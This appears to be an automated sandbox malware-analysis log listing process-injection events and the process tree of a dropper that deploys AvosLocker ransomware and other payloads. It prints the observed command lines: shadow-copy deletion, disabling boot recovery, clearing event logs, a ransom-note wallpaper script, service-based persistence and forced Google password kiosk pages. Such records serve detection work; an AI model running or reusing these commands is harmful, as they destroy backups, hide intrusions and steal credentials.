PID 3748 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\a\v.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\a\v.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\a\v.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\a\v.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\a\v.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\a\v.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\a\v.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\a\l.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\a\l.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\a\l.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\a\l.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\a\l.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\a\l.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\a\l.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\a\l.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\a\l.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2652 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe
PID 2652 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe
PID 2652 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe
PID 3808 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 664 wrote to memory of 840 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 664 wrote to memory of 840 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5104 wrote to memory of 38024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5104 wrote to memory of 38024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4508 wrote to memory of 38044 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4508 wrote to memory of 38044 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4796 wrote to memory of 38036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4796 wrote to memory of 38036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2532 wrote to memory of 38052 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe

"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"

C:\Users\Admin\AppData\Local\Temp\a\pclient.exe

"C:\Users\Admin\AppData\Local\Temp\a\pclient.exe"

C:\Users\Admin\AppData\Local\Temp\a\s.exe

"C:\Users\Admin\AppData\Local\Temp\a\s.exe"

C:\Users\Admin\AppData\Local\Temp\a\v.exe

"C:\Users\Admin\AppData\Local\Temp\a\v.exe"

C:\Users\Admin\AppData\Local\Temp\a\l.exe

"C:\Users\Admin\AppData\Local\Temp\a\l.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe

"C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Users\Admin\AppData\Local\Temp\a\fugu.exe

"C:\Users\Admin\AppData\Local\Temp\a\fugu.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\a\66dd9bfe41964_w9.exe

"C:\Users\Admin\AppData\Local\Temp\a\66dd9bfe41964_w9.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Users\Admin\AppData\Local\Temp\a\66dcab0bcba58_crypted.exe

"C:\Users\Admin\AppData\Local\Temp\a\66dcab0bcba58_crypted.exe"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\434945227.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

C:\Users\Admin\AppData\Local\Temp\a\66dd2c2d3b88f_opera.exe

"C:\Users\Admin\AppData\Local\Temp\a\66dd2c2d3b88f_opera.exe"

C:\Users\Admin\AppData\Local\Temp\a\66dcad8f5f33a_crypted.exe

"C:\Users\Admin\AppData\Local\Temp\a\66dcad8f5f33a_crypted.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\JEGDGIIJJE.exe"

C:\ProgramData\JEGDGIIJJE.exe

"C:\ProgramData\JEGDGIIJJE.exe"

C:\Users\Admin\AppData\Local\Temp\0e8d0864aa\svoutse.exe

"C:\Users\Admin\AppData\Local\Temp\0e8d0864aa\svoutse.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9f612cc40,0x7ff9f612cc4c,0x7ff9f612cc58

C:\Users\Admin\AppData\Roaming\1000026000\c2f184ac9f.exe

"C:\Users\Admin\AppData\Roaming\1000026000\c2f184ac9f.exe"

C:\ProgramData\IEHJJECBKK.exe

"C:\ProgramData\IEHJJECBKK.exe"

C:\Users\Admin\AppData\Local\Temp\1000030001\57725f46c1.exe

"C:\Users\Admin\AppData\Local\Temp\1000030001\57725f46c1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Installer.exe

"C:\Users\Admin\AppData\Local\Temp\a\Installer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\ProgramData\AAEBAKKJKK.exe

"C:\ProgramData\AAEBAKKJKK.exe"

C:\Users\Admin\AppData\Local\Temp\1000033001\3ebb97c342.exe

"C:\Users\Admin\AppData\Local\Temp\1000033001\3ebb97c342.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "RRTELIGS"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGHCGIIDGDAK" & exit

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "RRTELIGS" binpath= "C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe" start= "auto"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Temp\a\66d9f685932be_uninstaller.exe

"C:\Users\Admin\AppData\Local\Temp\a\66d9f685932be_uninstaller.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "RRTELIGS"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe

C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe

C:\Users\Admin\AppData\Local\Temp\a\66d9f6e9330e4_deep.exe

"C:\Users\Admin\AppData\Local\Temp\a\66d9f6e9330e4_deep.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\svchost.exe

svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Temp\a\66d9ddcb9dbfe_Build.exe

"C:\Users\Admin\AppData\Local\Temp\a\66d9ddcb9dbfe_Build.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe

"C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe

"C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe"

C:\Users\Admin\AppData\Local\Temp\a\Accounts.exe

"C:\Users\Admin\AppData\Local\Temp\a\Accounts.exe"

C:\Users\Admin\AppData\Local\Temp\a\Meeting.sfx.exe

"C:\Users\Admin\AppData\Local\Temp\a\Meeting.sfx.exe"

C:\Users\Admin\AppData\Local\Temp\a\Meeting.exe

"C:\Users\Admin\AppData\Local\Temp\a\Meeting.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Temp\a\ywp.exe

"C:\Users\Admin\AppData\Local\Temp\a\ywp.exe"

C:\Users\Admin\AppData\Local\Temp\0e8d0864aa\svoutse.exe

C:\Users\Admin\AppData\Local\Temp\0e8d0864aa\svoutse.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

